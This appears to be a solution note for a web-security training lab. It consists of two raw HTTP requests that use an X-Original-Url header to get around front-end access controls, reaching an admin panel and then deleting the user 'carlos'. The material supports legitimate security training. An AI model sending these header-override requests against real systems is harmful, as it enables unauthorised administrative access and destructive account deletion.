GET / HTTP/2
Host: 0ae20094039c15b9814a0c00008a0003.web-security-academy.net
Cookie: session=Bqs0xPVJBOoUrq2aKEJknqPkllmYWghO
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://0ae20094039c15b9814a0c00008a0003.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
X-Original-Url: /admin

with this reqest you will access the admin panel 

GET /?username=carlos HTTP/2
Host: 0ae20094039c15b9814a0c00008a0003.web-security-academy.net
Cookie: session=Bqs0xPVJBOoUrq2aKEJknqPkllmYWghO
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://0ae20094039c15b9814a0c00008a0003.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
X-Original-Url: /admin/delete